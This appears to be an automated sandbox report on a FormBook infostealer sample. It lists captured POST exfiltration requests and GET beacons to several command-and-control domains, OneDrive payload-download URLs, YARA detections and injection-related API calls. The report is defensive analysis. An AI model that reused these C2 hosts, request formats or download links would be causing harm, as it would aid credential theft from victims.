Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.unitedgamesreviews.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.unitedgamesreviews.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 75 72 61 31 4c 79 41 7a 39 34 61 6c 34 4c 34 42 64 67 73 69 48 54 53 51 73 61 62 4d 6e 4d 79 6d 73 53 39 2d 38 69 5a 45 5a 6c 68 46 45 73 62 44 67 4a 45 74 39 50 54 32 69 74 34 46 30 4a 45 61 51 37 54 49 61 73 53 66 56 36 53 62 55 58 33 35 34 4d 6d 63 65 76 33 63 5a 49 7a 6f 33 4d 6b 39 7a 2d 46 68 6b 43 57 69 38 46 73 4d 43 46 64 79 55 48 77 69 76 46 28 78 33 6f 4d 72 52 79 49 74 6b 43 66 57 38 57 64 47 4c 72 67 54 31 79 4e 6f 43 53 50 73 4d 59 68 46 64 35 6e 33 69 68 77 45 72 79 70 58 48 32 70 4f 4d 67 66 62 73 32 39 74 6f 67 5a 4c 34 4c 4e 50 6b 38 6c 7a 68 37 71 41 62 4c 49 43 53 4e 73 57 51 53 4a 6e 44 52 6c 35 6b 4b 76 53 44 61 6f 6b 32 4d 50 73 6b 37 67 57 43 4a 44 66 51 56 59 78 4a 4e 69 5f 4d 66 78 6e 55 58 46 36 46 49 38 59 58 53 70 5f 53 73 32 46 74 5a 56 35 28 62 63 4e 5a 42 33 38 49 41 65 57 52 6f 66 6e 74 71 4f 58 54 50 56 51 48 58 42 2d 42 61 62 55 6f 53 4e 55 4c 52 4e 54 4e 32 41 5a 41 56 7e 49 41 42 37 76 69 4b 55 44 75 38 28 62 6d 67 4c 51 7a 30 34 52 73 43 4d 59 36 64 68 5a 65 73 4a 34 37 39 76 42 47 72 56 52 31 5f 59 6e 4a 75 5a 43 6d 4b 4d 72 74 30 55 30 63 79 51 63 76 77 4a 4e 38 64 41 77 35 73 4c 35 55 37 53 63 49 7a 78 79 7e 35 51 37 72 73 6f 43 49 44 79 33 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=ura1LyAz94al4L4BdgsiHTSQsabMnMymsS9-8iZEZlhFEsbDgJEt9PT2it4F0JEaQ7TIasSfV6SbUX354Mmcev3cZIzo3Mk9z-FhkCWi8FsMCFdyUHwivF(x3oMrRyItkCfW8WdGLrgT1yNoCSPsMYhFd5n3ihwErypXH2pOMgfbs29togZL4LNPk8lzh7qAbLICSNsWQSJnDRl5kKvSDaok2MPsk7gWCJDfQVYxJNi_MfxnUXF6FI8YXSp_Ss2FtZV5(bcNZB38IAeWRofntqOXTPVQHXB-BabUoSNULRNTN2AZAV~IAB7viKUDu8(bmgLQz04RsCMY6dhZesJ479vBGrVR1_YnJuZCmKMrt0U0cyQcvwJN8dAw5sL5U7ScIzxy~5Q7rsoCIDy3~w).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.unitedgamesreviews.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.unitedgamesreviews.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 75 72 61 31 4c 33 31 41 78 6f 4f 34 75 75 55 7a 66 52 34 44 64 53 36 46 67 4b 66 36 71 38 36 31 7a 52 6f 68 38 6d 64 41 4d 78 6c 58 4f 73 4c 44 78 72 73 55 6e 5f 54 33 32 64 34 47 77 4a 42 7a 64 4d 50 51 61 6f 4b 6d 56 38 4b 59 64 30 28 34 34 38 6d 4c 66 50 71 76 4d 59 6e 4a 33 4f 41 45 7a 64 70 70 68 43 61 69 69 6c 6b 4f 4e 45 4d 6d 58 46 55 6e 78 45 54 4f 6b 38 55 49 52 69 6b 56 6b 6c 44 6b 73 43 56 45 4d 64 49 61 36 52 55 42 55 52 66 5f 41 6f 6c 43 53 65 76 67 74 6a 55 49 73 7a 70 31 4c 54 64 4e 4d 51 48 76 70 31 6c 36 7e 68 4e 59 35 66 77 2d 6b 39 68 6a 28 6f 7e 64 66 4d 49 4b 43 76 4a 39 61 44 39 6c 42 69 39 68 70 70 48 67 42 61 34 4c 70 5f 61 2d 67 72 4d 44 50 76 66 50 61 56 78 4a 49 2d 32 34 45 4e 35 54 56 77 6c 4d 49 70 4d 6e 4e 45 6f 33 61 66 75 4e 71 62 5a 6c 69 4c 63 75 62 42 33 6f 48 67 66 68 55 6f 54 57 6f 36 7e 35 57 4d 6c 41 48 47 6f 30 45 66 62 32 31 69 30 6f 4e 68 4d 53 56 57 52 6d 4c 6e 53 66 48 43 6d 51 6d 4b 55 6d 6c 61 54 55 6d 67 4c 55 7a 32 51 5f 74 32 63 59 38 4e 42 4b 54 72 64 4b 7a 64 76 6d 44 37 46 54 38 73 63 52 4a 75 42 43 70 62 38 42 74 46 63 30 4b 7a 67 66 73 53 78 4e 7e 74 41 77 30 4d 4b 54 45 4a 4f 55 4a 46 6c 51 31 5a 68 45 70 4c 30 52 4c 68 7a 6c 6b 54 4b 77 54 76 42 47 6e 50 62 41 63 58 45 69 74 62 78 53 72 46 58 73 4d 66 4a 6b 4e 2d 6b 62 31 39 49 73 67 69 68 35 5a 37 34 78 4f 59 38 5a 6a 32 52 72 37 7a 54 41 61 6d 37 70 78 6f 35 67 69 72 6a 6e 68 44 67 53 42 4f 41 5a 32 75 59 78 47 4c 71 5f 31 4f 4a 63 31 4d 47 4b 4e 58 76 43 6e 63 36 36 68 4a 4e 6b 38 61 7a 32 
30 49 35 7a 6d 7a 71 6a 4c 58 44 4d 7e 64 6d 76 6e 55 50 6a 55 6e 77 67 79 72 73 63 51 44 6e 67 4f 2d 64 47 4b 6f 66 65 63 39 43 37 78 7a 76 42 4a 6f 6e 68 6f 76 73 66 70 54 6c 69 6d 4f 56 4c 51 6d 73 6d 39 62 41 6a 54 54 44 62 48 71 42 2d 74 41 66 56 73 42 73 32 76 74 57 78 59 66 4b 66 51 42 4d 2d 71 65 6a 57 4c 61 6d 35 64 50 48 5f 6c 6e 66 57 70 57 6c 67 6d 67 6b 2d 4b 57 75 41 4b 70 44 42 43 54 5a 53 62 57 39 6d 68 73 47 2d 36 53 61 62 61 7a 6a 67 41 61 67 68 6c 72 30 54 39 72 66 47 54 4a 78 6b 34 6b 32 59 4e 56 78 54 53 66 28 71 36 44 6d 6b 45 63 48 70 37 36 30 72 56 41 4e 4f 7a 2d 68 59 68 6c 6b 31 63 36 33 37 4e 32 52 4b 70 7a 79 70 66 79 63 68 4f 42 4a 5f 57 78 71 32 50 42 4d 50 74 56 39 4c 4d 4a 75 75 7a 32 59 6d 43 64 4a 63 4a 53 70 39 63 4c 4c 5f 72 5a 4f 77 69 6b 36 45 43 4f 69 54 65 65 4e 35 51 45 7e 58 7a 64 6a 61 42 52 46 53 33 61 63 46 35 4d 57 44 6f 62 6c 76 4d 4b 58 4a 57 59 53 30 59 75 51 74 4e 37 69 68 33 5a 4d 4d 37 30 5a 33 34 42 45 57 42 43 53 75 53 59 52 44 34 78 46 32 38 75 62 6f 4a
Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=NsNsxeBPlrPiTgS9PP58UUflimdpAUL5lqUDkgQyH8o5OCzmy0StWinhpygoIu1EeSbM&aBR=nzuD_jr HTTP/1.1Host: www.ontariobrokers.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=B5PZdHLghsUOEGl3YThmAxwc5Q2JZtslVwuxmQEXEBgCU6TSZbpNnkclXQwV4rvxtjxB&aBR=nzuD_jr HTTP/1.1Host: www.zhiguohulian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=mJWPVSoyqfPZs8UJSkt9FmfqvIPNq9yK3Wcj61pPIQpPL4OfnZhXtLvw2+R7wcITKeuf&aBR=nzuD_jr HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Posts data to webserver
Source: unknownHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 73 53 72 35 76 4f 66 63 38 39 38 62 62 62 6a 43 55 50 5a 67 36 31 30 70 37 4d 51 55 50 50 53 7a 71 4b 4d 4e 4e 77 6f 33 79 52 6e 57 65 4b 47 54 30 45 53 68 52 74 46 38 36 33 4d 6c 61 56 58 44 4d 76 62 77 79 57 6f 65 7a 51 55 69 44 35 43 74 75 74 63 41 37 32 31 38 4f 54 44 52 43 4c 4b 36 52 67 31 72 5f 6a 76 37 6c 48 73 78 6a 4b 4c 4c 42 62 62 42 4d 36 32 35 43 31 34 69 2d 30 33 6e 38 56 45 65 72 50 61 4b 65 6d 36 6f 41 67 78 78 76 75 57 44 59 34 5a 48 79 34 66 54 38 69 75 52 6e 6f 62 53 31 54 41 77 5f 7e 70 37 78 35 6f 45 77 44 51 71 6a 34 4c 62 56 58 57 42 54 64 51 65 6b 65 39 51 58 37 56 34 66 6e 39 6c 4d 4d 76 4a 34 45 64 4f 31 51 4e 74 4e 37 4e 6d 33 41 41 4b 2d 4d 78 34 4f 33 41 67 44 54 5f 68 52 59 74 61 79 30 75 59 45 31 4b 65 4f 33 58 48 42 4d 32 6a 54 36 54 7e 4f 55 63 44 5a 65 61 72 57 39 51 43 59 6b 42 56 44 7e 73 28 37 76 39 56 5f 6f 45 47 62 75 74 33 5f 71 77 4e 74 46 67 64 38 73 39 6c 54 43 62 56 59 61 38 63 5a 28 75 57 44 76 2d 77 49 31 63 64 65 77 39 30 45 42 41 70 6a 54 5f 47 51 46 4f 39 73 49 54 30 37 30 68 44 6b 37 4c 77 44 43 30 6e 51 6f 51 75 51 69 6b 4f 4c 37 6b 53 58 7e 39 6c 2d 77 2d 58 7a 6e 6f 5a 4e 64 48 73 63 7e 32 54 4e 78 49 64 71 49 6d 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=BuAOzsSr5vOfc898bbbjCUPZg610p7MQUPPSzqKMNNwo3yRnWeKGT0EShRtF863MlaVXDMvbwyWoezQUiD5CtutcA7218OTDRCLK6Rg1r_jv7lHsxjKLLBbbBM625C14i-03n8VEerPaKem6oAgxxvuWDY4ZHy4fT8iuRnobS1TAw_~p7x5oEwDQqj4LbVXWBTdQeke9QX7V4fn9lMMvJ4EdO1QNtN7Nm3AAK-Mx4O3AgDT_hRYtay0uYE1KeO3XHBM2jT6T~OUcDZearW9QCYkBVD~s(7v9V_oEGbut3_qwNtFgd8s9lTCbVYa8cZ(uWDv-wI1cdew90EBApjT_GQFO9sIT070hDk7LwDC0nQoQuQikOL7kSX~9l-w-XznoZNdHsc~2TNxIdqIm5A).
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Apr 2020 00:52:20 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 61 32 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sa22/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
URLs found in memory or binary data
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp | String found in binary or memory: http://mscrl.%
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digi3Am
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.893559028.0000000007B92000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/32
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/E
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/U
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/g
Source: filename1.exe, 00000005.00000003.829732223.00000000008E3000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4m6mKZSuQwkXEGymg7hEk0kp6mUmdmxbOOGLs_djyrPR8HMUKzbvAr7Ilver4dVuMn
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mCaW0IYh1142nzLVtBXWOcELews40HL9i3tI6S1VZ6BwvDTHEv88MF42IgqPKYOX8
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mCaW0IYh1142nzLVtBXWOcELews40HL9i3tI6S1VZ6BwvDTHEv88M_
Source: filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmp | String found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mDHUFfQ2g1XTQrB-cYwN_hG6Cxc6i0TPSf0h8A5pxArHU7tJntTru2LQqeUciZ-eZ
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/)
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmp, filename1.exe, 00000008.00000002.888713543.00000000020A0000.00000040.00000001.sdmp, filename1.exe, 0000000A.00000002.890492359.00000000004F0000.00000040.00000001.sdmp, filename1.exe, 0000000C.00000002.915983254.00000000004F0000.00000040.00000001.sdmp, gdi4hxdb6.exe, 00000017.00000002.1215308297.00000000021B0000.00000040.00000001.sdmp, gdi4hxdb6.exe, 00000018.00000002.1218332130.00000000004F0000.00000040.00000001.sdmp, filename1.exe, 00000019.00000002.1251116860.00000000020F0000.00000040.00000001.sdmp, filename1.exe, 0000001A.00000002.1277558142.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=569F732A389E1EA2&resid=569F732A389E1EA2%21411&authkey=ABTtM_3
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: filename1.exe, 00000002.00000002.820542037.0000000000700000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe | Code function: 1_2_004F5A06 NtProtectVirtualMemory,1_2_004F5A06
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe | Code function: 1_2_004F01AB EnumWindows,NtSetInformationThread,TerminateProcess,1_2_004F01AB
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe | Code function: 1_2_004F02BC NtSetInformationThread,TerminateProcess,1_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E5A06 NtProtectVirtualMemory,2_2_022E5A06
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E1F11 NtWriteVirtualMemory,2_2_022E1F11
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E01AB EnumWindows,NtSetInformationThread,TerminateProcess,2_2_022E01AB
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E2206 NtWriteVirtualMemory,2_2_022E2206
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E02BC NtSetInformationThread,TerminateProcess,2_2_022E02BC
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E20B3 NtWriteVirtualMemory,2_2_022E20B3
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E2360 NtWriteVirtualMemory,2_2_022E2360
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 2_2_022E1FA9 NtWriteVirtualMemory,2_2_022E1FA9
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A750 NtCreateFile,LdrInitializeThunk,5_2_1F41A750
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A700 NtProtectVirtualMemory,LdrInitializeThunk,5_2_1F41A700
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A720 NtResumeThread,LdrInitializeThunk,5_2_1F41A720
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_1F41A610
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A6A0 NtCreateSection,LdrInitializeThunk,5_2_1F41A6A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A540 NtDelayExecution,LdrInitializeThunk,5_2_1F41A540
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A560 NtQuerySystemInformation,LdrInitializeThunk,5_2_1F41A560
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A5F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_1F41A5F0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A410 NtQueryInformationToken,LdrInitializeThunk,5_2_1F41A410
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A480 NtMapViewOfSection,LdrInitializeThunk,5_2_1F41A480
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A4A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_1F41A4A0
Source: C:\Users\user\subfolder1\filename1.exe | Code function: 5_2_1F41A360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_1F41A360
